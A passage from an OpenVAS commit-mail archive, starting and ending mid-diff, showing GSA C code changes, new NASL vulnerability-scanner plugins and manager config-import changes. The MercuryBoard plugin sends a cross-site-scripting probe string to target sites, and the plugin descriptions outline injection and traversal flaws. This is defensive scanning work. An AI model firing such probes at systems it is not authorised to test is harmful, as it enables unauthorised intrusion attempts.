(validator, "password", "^[[:alnum:], \\./]{0,40}$"); /** @todo Better regex. */ @@ -234,10 +235,12 @@ openvas_validator_add (validator, "sort_order", "^(ascending)|(descending)$"); openvas_validator_add (validator, "uuid", "^[0-9abcdefABCDEF.]{1,40}$"); + + openvas_validator_alias (validator, "base", "name"); + openvas_validator_alias (validator, "escalator", "name"); openvas_validator_alias (validator, "scanconfig", "name"); openvas_validator_alias (validator, "scantarget", "name"); - openvas_validator_alias (validator, "base", "name"); - openvas_validator_alias (validator, "escalator", "name"); + openvas_validator_alias (validator, "refresh_interval", "number"); openvas_validator_alias (validator, "event", "condition"); openvas_validator_alias (validator, "method", "condition"); openvas_validator_alias (validator, "level_high", "boolean"); @@ -1524,7 +1527,8 @@ con_info->response = get_status_omp (credentials, NULL, con_info->req_parms.sort_field, - con_info->req_parms.sort_order); + con_info->req_parms.sort_order, + ""); } else if (!strcmp (con_info->req_parms.cmd, "save_config")) { @@ -1629,18 +1633,19 @@ { char *cmd = NULL; const char *agent_format = NULL; - const char *task_id = NULL; - const char *report_id = NULL; - const char *format = NULL; + const char *task_id = NULL; + const char *report_id = NULL; + const char *format = NULL; const char *package_format = NULL; - const char *name = NULL; - const char *family = NULL; + const char *name = NULL; + const char *family = NULL; const char *first_result = NULL; - const char *max_results = NULL; - const char *oid = NULL; - const char *sort_field = NULL; - const char *sort_order = NULL; - const char *levels = NULL; + const char *max_results = NULL; + const char *oid = NULL; + const char *sort_field = NULL; + const char *sort_order = NULL; + const char *levels = NULL; + const char *refresh_interval = NULL; int high = 0, medium = 0, low = 0, log = 0; credentials_t *credentials = NULL; @@ -1733,6 +1738,12 @@ if (openvas_validate (validator, "sort_field", sort_field)) sort_field = NULL; + refresh_interval = MHD_lookup_connection_value (connection, + MHD_GET_ARGUMENT_KIND, + "refresh_interval"); + if (openvas_validate (validator, "refresh_interval", refresh_interval)) + refresh_interval = NULL; + sort_order = MHD_lookup_connection_value (connection, MHD_GET_ARGUMENT_KIND, "sort_order"); @@ -1809,7 +1820,7 @@ else if ((!strcmp (cmd, "get_status")) && (task_id != NULL) && (strlen (task_id) < VAL_MAX_SIZE)) - return get_status_omp (credentials, task_id, sort_field, sort_order); + return get_status_omp (credentials, task_id, sort_field, sort_order, refresh_interval); else if ((0 == strcmp (cmd, "delete_agent")) && (name != NULL)) return delete_agent_omp (credentials, name); @@ -1969,7 +1980,7 @@ } else if (!strcmp (cmd, "get_status")) - return get_status_omp (credentials, NULL, sort_field, sort_order); + return get_status_omp (credentials, NULL, sort_field, sort_order, refresh_interval); else if ((!strcmp (cmd, "get_target")) && (name != NULL)) return get_target_omp (credentials, name, sort_field, sort_order); Modified: trunk/gsa/src/gsad_omp.c =================================================================== --- trunk/gsa/src/gsad_omp.c 2010-01-05 09:14:05 UTC (rev 6311) +++ trunk/gsa/src/gsad_omp.c 2010-01-05 13:46:48 UTC (rev 6312) @@ -686,15 +686,17 @@ * @param[in] task_id ID of task. * @param[in] sort_field Field to sort on, or NULL. * @param[in] sort_order "ascending", "descending", or NULL. + * @param[in] refresh_interval Refresh interval (parsed to int). * * @return Result of XSL transformation. */ char * get_status_omp (credentials_t * credentials, const char *task_id, - const char *sort_field, const char *sort_order) + const char *sort_field, const char *sort_order, + const char *refresh_interval) { entity_t entity; - char *text = NULL; + GString *xml = NULL; gnutls_session_t session; int socket; @@ -744,9 +746,11 @@ } entity = NULL; - if (read_entity_and_text (&session, &entity, &text)) + xml = g_string_new ("<get_status>"); + if (read_entity_and_string (&session, &entity, &xml)) { openvas_server_close (socket, session); + g_string_free (xml, TRUE); return gsad_message ("Internal error", __FUNCTION__, __LINE__, "An internal error occurred while getting the status. " "No update of the status can be retrieved. " @@ -755,8 +759,14 @@ } free_entity (entity); + g_string_append (xml, "</get_status>"); + if (refresh_interval && strcmp (refresh_interval, "") + && strcmp (refresh_interval, "0")) + g_string_append_printf (xml, "<autorefresh interval=\"%s\" />", + refresh_interval); + openvas_server_close (socket, session); - return xsl_transform_omp (credentials, text); + return xsl_transform_omp (credentials, g_string_free (xml, FALSE)); } /** @@ -966,7 +976,7 @@ const char * sort_order) { entity_t entity; - GString *xml; + GString *xml = NULL; gnutls_session_t session; int socket; @@ -977,8 +987,6 @@ "Diagnostics: Failure to connect to manager daemon.", "/omp?cmd=get_lsc_credentials"); - xml = g_string_new ("<get_lsc_credential>"); - /* Get the target. */ if (openvas_server_sendf (&session, @@ -991,7 +999,6 @@ sort_order ? sort_order : "ascending") == -1) { - g_string_free (xml, TRUE); openvas_server_close (socket, session); return gsad_message ("Internal error", __FUNCTION__, __LINE__, "An internal error occurred while getting a credential. " @@ -1001,6 +1008,8 @@ } entity = NULL; + xml = g_string_new ("<get_lsc_credential>"); + if (read_entity_and_string (&session, &entity, &xml)) { g_string_free (xml, TRUE); Modified: trunk/gsa/src/gsad_omp.h =================================================================== --- trunk/gsa/src/gsad_omp.h 2010-01-05 09:14:05 UTC (rev 6311) +++ trunk/gsa/src/gsad_omp.h 2010-01-05 13:46:48 UTC (rev 6312) @@ -48,7 +48,7 @@ char * start_task_omp (credentials_t *, const char *); char * get_status_omp (credentials_t *, const char *, const char *, - const char *); + const char *, const char*); char * delete_report_omp (credentials_t *, const char *, const char *); char * get_report_omp (credentials_t *, const char *, const char *, Modified: trunk/gsa/src/html/make_html =================================================================== --- trunk/gsa/src/html/make_html 2010-01-05 09:14:05 UTC (rev 6311) +++ trunk/gsa/src/html/make_html 2010-01-05 13:46:48 UTC (rev 6312) @@ -61,4 +61,3 @@ clean: rm -rf $(BUILDDIR)/* - Modified: trunk/gsa/src/html/src/gsad.xsl =================================================================== --- trunk/gsa/src/html/src/gsad.xsl 2010-01-05 09:14:05 UTC (rev 6311) +++ trunk/gsa/src/html/src/gsad.xsl 2010-01-05 13:46:48 UTC (rev 6312) @@ -43,9 +43,15 @@ <link rel="stylesheet" type="text/css" href="/gsa-style.css"/> <link rel="icon" href="/favicon.gif" type="image/x-icon"/> <title>Greenbone Security Assistant + + + + + +
Modified: trunk/gsa/src/html/src/omp.xsl =================================================================== --- trunk/gsa/src/html/src/omp.xsl 2010-01-05 09:14:05 UTC (rev 6311) +++ trunk/gsa/src/html/src/omp.xsl 2010-01-05 13:46:48 UTC (rev 6312) @@ -42,6 +42,11 @@ + +
@@ -52,9 +57,18 @@ - - - + +
+ + + +
+
From scm-commit at wald.intevation.org Tue Jan 5 18:50:31 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 5 Jan 2010 18:50:31 +0100 (CET) Subject: [Openvas-commits] r6313 - in trunk/openvas-plugins: . scripts Message-ID: <20100105175031.3153786607D7@pyrosoma.intevation.org> Author: mime Date: 2010-01-05 18:50:28 +0100 (Tue, 05 Jan 2010) New Revision: 6313 Added: trunk/openvas-plugins/scripts/AproxEngine_37515.nasl trunk/openvas-plugins/scripts/AproxEngine_detect.nasl trunk/openvas-plugins/scripts/MercuryBoard_37605.nasl trunk/openvas-plugins/scripts/MercuryBoard_detect.nasl trunk/openvas-plugins/scripts/httpdx_37586.nasl trunk/openvas-plugins/scripts/xoops_37597.nasl Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/cve_current.txt Log: Added new plugins Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2010-01-05 13:46:48 UTC (rev 6312) +++ trunk/openvas-plugins/ChangeLog 2010-01-05 17:50:28 UTC (rev 6313) @@ -1,3 +1,13 @@ +2010-01-05 Michael Meyer + + * scripts/AproxEngine_detect.nasl, + scripts/xoops_37597.nasl, + scripts/MercuryBoard_37605.nasl, + scripts/AproxEngine_37515.nasl, + scripts/httpdx_37586.nasl, + scripts/MercuryBoard_detect.nasl: + Added new plugins. + 2010-01-04 Michael Meyer * scripts/sendmail_37543.nasl, Modified: trunk/openvas-plugins/cve_current.txt =================================================================== --- trunk/openvas-plugins/cve_current.txt 2010-01-05 13:46:48 UTC (rev 6312) +++ trunk/openvas-plugins/cve_current.txt 2010-01-05 17:50:28 UTC (rev 6313) @@ -464,3 +464,7 @@ 37520 Greenbone svn R 37518 Greenbone svn R 37432 Greenbone svn R +37586 Greenbone svn R +37597 Greenbone svn R +37605 Greenbone svn R +37515 Greenbone svn R Added: trunk/openvas-plugins/scripts/AproxEngine_37515.nasl =================================================================== --- trunk/openvas-plugins/scripts/AproxEngine_37515.nasl 2010-01-05 13:46:48 UTC (rev 6312) +++ trunk/openvas-plugins/scripts/AproxEngine_37515.nasl 2010-01-05 17:50:28 UTC (rev 6313) @@ -0,0 +1,110 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# AproxEngine Multiple Remote Input Validation Vulnerabilities +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100426); + script_bugtraq_id(37515); + script_version ("1.0-$Revision$"); + + script_name("AproxEngine Multiple Remote Input Validation Vulnerabilities"); + +desc = "Overview: +AproxEngine is prone to multiple input-validation vulnerabilities, +including SQL-injection, HTML-injection, directory-traversal, and email- +spoofing issues. + +Attackers can exploit these issues to execute arbitrary script code in +the context of the webserver, compromise the application, obtain +sensitive information, steal cookie-based authentication credentials +from legitimate users of the site, modify the way the site is +rendered, perform certain unauthorized actions in the context of a +user, access or modify data, or exploit latent vulnerabilities in the +underlying database. + +Attackers may require administrative privileges to exploit some of +these issues. + +AproxEngine 5.3.04 and 6.0 are vulnerable; other versions may also +be affected. + +References: +http://www.securityfocus.com/bid/37515 +http://secunia.com/secunia_research/2009-2/ +http://www.aprox.de/index.php?id=1 +http://www.securityfocus.com/archive/1/508641 + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if AproxEngine version is 5.3.04 or 6.0"); + script_category(ACT_GATHER_INFO); + script_family("Web application abuses"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("AproxEngine_detect.nasl"); + script_require_ports("Services/www", 80); + script_exclude_keys("Settings/disable_cgi_scanning"); + exit(0); +} + +include("http_func.inc"); +include("http_keepalive.inc"); +include("version_func.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); + +if (!can_host_php(port:port)) exit(0); + +if(!version = get_kb_item(string("www/", port, "/AproxEngine")))exit(0); +if(!matches = eregmatch(string:version, pattern:"^(.+) under (/.*)$"))exit(0); + +vers = matches[1]; + +if(!isnull(vers) && vers >!< "unknown") { + + if(version_is_equal(version: vers, test_version: "5.3.04")) { + security_warning(port:port); + exit(0); + } + + else if(version_is_equal(version: vers, test_version: "6")) { + + dir = matches[2]; + + url = string(dir, "/engine/inc/sql_login.inc"); + req = http_get(item:url, port:port); + buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE); + if( buf == NULL )exit(0); + + if(egrep(pattern: "AproxEngine Version V6 build 03.12.2009", string: buf)) { # build 03.12.2009 is vulnerable. builds after 03.12.2009 are patched. + security_warning(port:port); + exit(0); + } + } +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/AproxEngine_37515.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/AproxEngine_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/AproxEngine_detect.nasl 2010-01-05 13:46:48 UTC (rev 6312) +++ trunk/openvas-plugins/scripts/AproxEngine_detect.nasl 2010-01-05 17:50:28 UTC (rev 6313) @@ -0,0 +1,112 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# AproxEngine CMS Detection +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +# need desc here to modify it later in script. +desc = "Overview: +This host is running the AproxEngine CMS. + +See also: +http://www.aprox.de + +Risk factor : None"; + +if (description) +{ + script_id(100425); + script_version ("1.0-$Revision$"); + + script_name("AproxEngine CMS Detection"); + script_description(desc); + script_summary("Checks for the presence of AproxEngine CMS"); + script_category(ACT_GATHER_INFO); + script_family("Service detection"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("find_service.nes", "http_version.nasl"); + script_require_ports("Services/www", 80); + script_exclude_keys("Settings/disable_cgi_scanning"); + exit(0); +} + + +include("http_func.inc"); +include("http_keepalive.inc"); +include("global_settings.inc"); + +port = get_http_port(default:80); + +if(!get_port_state(port))exit(0); +if(!can_host_php(port:port))exit(0); + +dirs = make_list("/aproxengine","/cms",cgi_dirs()); + +foreach dir (dirs) { + + url = string(dir, "/engine/inc/version.info"); + req = http_get(item:url, port:port); + buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE); + if( buf == NULL )continue; + + if("AproxEngine" >< buf) + { + if(strlen(dir)>0) { + install=dir; + } else { + install=string("/"); + } + + vers = string("unknown"); + ### try to get version + version = eregmatch(string: buf, pattern: "AproxEngine V([0-9.]+)",icase:TRUE); + + if ( !isnull(version[1]) ) { + vers=chomp(version[1]); + set_kb_item(name: string("cpe:/a:aprox:aproxengine:",vers), value: TRUE); + } else { + set_kb_item(name: string("cpe:/a:aprox:aproxengine"), value: TRUE); + } + + set_kb_item(name: string("www/", port, "/AproxEngine"), value: string(vers," under ",install)); + + info = string("None\n\nAproxEngine Version '"); + info += string(vers); + info += string("' was detected on the remote host in the following directory(s):\n\n"); + info += string(install, "\n"); + + desc = ereg_replace( + string:desc, + pattern:"None$", + replace:info + ); + + if(report_verbosity > 0) { + security_note(port:port,data:desc); + } + exit(0); + + } +} +exit(0); + Property changes on: trunk/openvas-plugins/scripts/AproxEngine_detect.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/MercuryBoard_37605.nasl =================================================================== --- trunk/openvas-plugins/scripts/MercuryBoard_37605.nasl 2010-01-05 13:46:48 UTC (rev 6312) +++ trunk/openvas-plugins/scripts/MercuryBoard_37605.nasl 2010-01-05 17:50:28 UTC (rev 6313) @@ -0,0 +1,88 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# MercuryBoard 'index.php' Cross-Site Scripting Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100424); + script_bugtraq_id(37605); + script_version ("1.0-$Revision$"); + + script_name("MercuryBoard 'index.php' Cross-Site Scripting Vulnerability"); + +desc = "Overview: +MercuryBoard is prone to a cross-site scripting vulnerability because +the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code +in the browser of an unsuspecting user in the context of the affected +site. This may help the attacker steal cookie-based authentication +credentials and launch other attacks. + +MercuryBoard 1.1.5 is vulnerable; other versions may also be affected. + +References: +http://www.securityfocus.com/bid/37605 +http://www.mercuryboard.com/ + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if MercuryBoard is prone to a cross-site scripting vulnerability"); + script_category(ACT_GATHER_INFO); + script_family("Web application abuses"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("MercuryBoard_detect.nasl"); + script_require_ports("Services/www", 80); + script_exclude_keys("Settings/disable_cgi_scanning"); + exit(0); +} + +include("http_func.inc"); +include("http_keepalive.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); +if(!can_host_php(port:port))exit(0); + +if(!version = get_kb_item(string("www/", port, "/mercuryboard")))exit(0); +if(!matches = eregmatch(string:version, pattern:"^(.+) under (/.*)$"))exit(0); + +dir = matches[2]; + +url = string(dir,"/index.php/%3E%22%3E%3CScRiPt%3Ealert(%27openvas-xss-test%27)%3C/ScRiPt%3E"); +req = http_get(item:url, port:port); +buf = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE); +if( buf == NULL )continue; + +if(egrep(pattern: "", string: buf, icase: TRUE)) { + + security_warning(port:port); + exit(0); + +} + +exit(0); + Property changes on: trunk/openvas-plugins/scripts/MercuryBoard_37605.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/MercuryBoard_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/MercuryBoard_detect.nasl 2010-01-05 13:46:48 UTC (rev 6312) +++ trunk/openvas-plugins/scripts/MercuryBoard_detect.nasl 2010-01-05 17:50:28 UTC (rev 6313) @@ -0,0 +1,112 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# MercuryBoard Detection +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +# need desc here to modify it later in script. +desc = "Overview: +This host is running MercuryBoard, a message board system. + +See also: +http://www.mercuryboard.com + +Risk factor : None"; + +if (description) +{ + script_id(100423); + script_version ("1.0-$Revision$"); + + script_name("MercuryBoard Detection"); + script_description(desc); + script_summary("Checks for the presence of MercuryBoard"); + script_category(ACT_GATHER_INFO); + script_family("Service detection"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("find_service.nes", "http_version.nasl"); + script_require_ports("Services/www", 80); + script_exclude_keys("Settings/disable_cgi_scanning"); + exit(0); +} + + +include("http_func.inc"); +include("http_keepalive.inc"); +include("global_settings.inc"); + +port = get_http_port(default:80); + +if(!get_port_state(port))exit(0); +if(!can_host_php(port:port))exit(0); + +dirs = make_list("/board","/mercuryboard","/forums","/forum",cgi_dirs()); + +foreach dir (dirs) { + + url = string(dir, "/index.php"); + req = http_get(item:url, port:port); + buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE); + if( buf == NULL )continue; + + if(egrep(pattern: "Powered by.*MercuryBoard.*\[v[0-9.]+\]", string: buf, icase: TRUE)) + { + if(strlen(dir)>0) { + install=dir; + } else { + install=string("/"); + } + + vers = string("unknown"); + ### try to get version + version = eregmatch(string: buf, pattern: "\[v([0-9.]+)\]",icase:TRUE); + + if ( !isnull(version[1]) ) { + vers=chomp(version[1]); + set_kb_item(name: string("cpe:/a:mercuryboard:mercuryboard:",vers), value: TRUE); + } else { + set_kb_item(name: string("cpe:/a:mercuryboard:mercuryboard"), value: TRUE); + } + + set_kb_item(name: string("www/", port, "/mercuryboard"), value: string(vers," under ",install)); + + info = string("None\n\nMercuryBoard Version '"); + info += string(vers); + info += string("' was detected on the remote host in the following directory(s):\n\n"); + info += string(install, "\n"); + + desc = ereg_replace( + string:desc, + pattern:"None$", + replace:info + ); + + if(report_verbosity > 0) { + security_note(port:port,data:desc); + } + exit(0); + + } +} +exit(0); + Property changes on: trunk/openvas-plugins/scripts/MercuryBoard_detect.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/httpdx_37586.nasl =================================================================== --- trunk/openvas-plugins/scripts/httpdx_37586.nasl 2010-01-05 13:46:48 UTC (rev 6312) +++ trunk/openvas-plugins/scripts/httpdx_37586.nasl 2010-01-05 17:50:28 UTC (rev 6313) @@ -0,0 +1,76 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# httpdx Space Character Remote File Disclosure Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100421); + script_bugtraq_id(37586); + script_version ("1.0-$Revision$"); + + script_name("httpdx Space Character Remote File Disclosure Vulnerability"); + +desc = "Overview: +httpdx is prone to a remote file-disclosure vulnerability because it +fails to properly sanitize user-supplied input. + +An attacker can exploit this vulnerability to view the source code +of files in the context of the server process. This may aid in +further attacks. + +httpdx 1.5 is affected; other versions may be vulnerable as well. + +References: +http://www.securityfocus.com/bid/37586 +http://sourceforge.net/projects/httpdx/ +http://www.securityfocus.com/archive/1/508696 + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if httpdx version is 1.5"); + script_category(ACT_GATHER_INFO); + script_family("Web Servers"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("gb_httpdx_server_detect.nasl"); + script_require_ports("Services/www", 80); + exit(0); +} + +include("http_func.inc"); +include("version_func.inc"); + +httpdxPort = get_http_port(default:80); +if(!httpdxPort){ + exit(0); +} + +httpdxVer = get_kb_item("httpdx/" + httpdxPort + "/Ver"); +if(!isnull(httpdxVer)) +{ + if(version_is_equal(version:httpdxVer, test_version:"1.5")){ + security_warning(httpdxPort); + } +} Property changes on: trunk/openvas-plugins/scripts/httpdx_37586.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/xoops_37597.nasl =================================================================== --- trunk/openvas-plugins/scripts/xoops_37597.nasl 2010-01-05 13:46:48 UTC (rev 6312) +++ trunk/openvas-plugins/scripts/xoops_37597.nasl 2010-01-05 17:50:28 UTC (rev 6313) @@ -0,0 +1,90 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# XOOPS 'include/notification_update.php' SQL Injection Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100422); + script_bugtraq_id(37597); + script_version ("1.0-$Revision$"); + + script_name("XOOPS 'include/notification_update.php' SQL Injection Vulnerability"); + +desc = "Overview: +XOOPS is prone to an SQL-injection vulnerability because it fails +to sufficiently sanitize user-supplied data before using it in an +SQL query. + +Exploiting this issue could allow an attacker to compromise the +application, access or modify data, or exploit latent vulnerabilities +in the underlying database. + +Versions prior to XOOPS 2.4.3 are affected. + +Solution: +Updates are available. Please see the references for details. + +References: +http://www.securityfocus.com/bid/37597 +http://www.xoops.org/modules/news/article.php?storyid=5178 +http://www.xoops.org + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if XOOPS version is < 2.4.3"); + script_category(ACT_GATHER_INFO); + script_family("Web application abuses"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("secpod_xoops_detect.nasl"); + script_require_ports("Services/www", 80); + script_exclude_keys("Settings/disable_cgi_scanning"); + exit(0); +} + +include("http_func.inc"); +include("http_keepalive.inc"); +include("version_func.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); + +if (!can_host_php(port:port)) exit(0); + +if(!version = get_kb_item(string("www/", port, "/XOOPS")))exit(0); +if(!matches = eregmatch(string:version, pattern:"^(.+) under (/.*)$"))exit(0); + +vers = matches[1]; + +if(!isnull(vers)) { + + if(version_is_less(version: vers, test_version: "2.4.3")) { + security_warning(port:port); + exit(0); + } + +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/xoops_37597.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision From scm-commit at wald.intevation.org Tue Jan 5 20:53:08 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 5 Jan 2010 20:53:08 +0100 (CET) Subject: [Openvas-commits] r6314 - in trunk/openvas-manager: . src Message-ID: <20100105195308.D550B86607C3@pyrosoma.intevation.org> Author: mattm Date: 2010-01-05 20:53:07 +0100 (Tue, 05 Jan 2010) New Revision: 6314 Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/src/manage.h trunk/openvas-manager/src/omp.c trunk/openvas-manager/src/tasks_sql.h Log: Convert the GET_CONFIGS "nvt_selector" attribute to an "export" attribute. Add importing of entire configs to CREATE_CONFIG. Use a cleaner style of passing data between the parser callbacks for the import implementation, as a start towards using a cleaner data passing mechanism throughout. * src/tasks_sql.h (insert_nvt_selectors, config_insert_preferences) (create_config_rc): New functions. (create_config): Move body to create_config_rc. Reimplement to expect full config. (update_config_caches): Add config arg. Update caller. * src/manage.h: Adjust headers accordingly. (array_t, preference_t, nvt_selector_t): New types. * src/omp.c (array_add): Convert string arg type to gpointer. (free_array): Add NULL check. (array_reset, preference_new, nvt_selector_new) (create_config_data_reset, command_data_init): New functions. (import_config_data_t, create_config_data_t, command_data_t): New type. (command_data, create_config_data, import_config_data): New variables. (client_state_t): Add GET_CONFIGS import states. (omp_xml_handle_start_element, omp_xml_handle_end_element): Convert GET_CONFIGS "nvt_selectors" to "export", which responds with data suitable for import. Add CREATE_CONFIG import handling. (omp_xml_handle_text): Add CREATE_CONFIG import handling. (init_omp): Initialise command_data. Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2010-01-05 17:50:28 UTC (rev 6313) +++ trunk/openvas-manager/ChangeLog 2010-01-05 19:53:07 UTC (rev 6314) @@ -1,3 +1,33 @@ +2009-01-05 Matthew Mundell + + Convert the GET_CONFIGS "nvt_selector" attribute to an "export" + attribute. Add importing of entire configs to CREATE_CONFIG. + Use a cleaner style of passing data between the parser callbacks for + the import implementation, as a start towards using a cleaner data + passing mechanism throughout. + + * src/tasks_sql.h (insert_nvt_selectors, config_insert_preferences) + (create_config_rc): New functions. + (create_config): Move body to create_config_rc. Reimplement to expect + full config. + (update_config_caches): Add config arg. Update caller. + + * src/manage.h: Adjust headers accordingly. + (array_t, preference_t, nvt_selector_t): New types. + + * src/omp.c (array_add): Convert string arg type to gpointer. + (free_array): Add NULL check. + (array_reset, preference_new, nvt_selector_new) + (create_config_data_reset, command_data_init): New functions. + (import_config_data_t, create_config_data_t, command_data_t): New type. + (command_data, create_config_data, import_config_data): New variables. + (client_state_t): Add GET_CONFIGS import states. + (omp_xml_handle_start_element, omp_xml_handle_end_element): Convert + GET_CONFIGS "nvt_selectors" to "export", which responds with data suitable + for import. Add CREATE_CONFIG import handling. + (omp_xml_handle_text): Add CREATE_CONFIG import handling. + (init_omp): Initialise command_data. + 2010-01-05 Felix Wolfsteller * src/omp.c (print_report_latex): Fixed size issues in service/port per @@ -50,7 +80,6 @@ verbatim environment. (print_report_latex): Removed done todo, minor style edit. ->>>>>>> .r6304 2009-12-31 Matthew Mundell Add OMP command TEST_ESCALATOR. Modified: trunk/openvas-manager/src/manage.h =================================================================== --- trunk/openvas-manager/src/manage.h 2010-01-05 17:50:28 UTC (rev 6313) +++ trunk/openvas-manager/src/manage.h 2010-01-05 19:53:07 UTC (rev 6314) @@ -711,10 +711,33 @@ /* Configs. */ +typedef GPtrArray array_t; + +typedef struct +{ + char *name; + char *type; + char *value; + char *nvt_name; + char *nvt_oid; + array_t *alts; /* gchar. */ +} preference_t; + +typedef struct +{ + char *name; + char *type; + int include; + char *family_or_nvt; +} nvt_selector_t; + int -create_config (const char*, const char*, char*); +create_config (const char*, const char*, const array_t*, const array_t*); int +create_config_rc (const char*, const char*, char*); + +int copy_config (const char*, const char*, const char*); int Modified: trunk/openvas-manager/src/omp.c =================================================================== --- trunk/openvas-manager/src/omp.c 2010-01-05 17:50:28 UTC (rev 6313) +++ trunk/openvas-manager/src/omp.c 2010-01-05 19:53:07 UTC (rev 6314) @@ -140,15 +140,15 @@ } /** - * @brief Push a string onto a global array. + * @brief Push a generic pointer onto a global array. * - * @param[in] array Array. - * @param[in] string String. + * @param[in] array Array. + * @param[in] pointer Pointer. 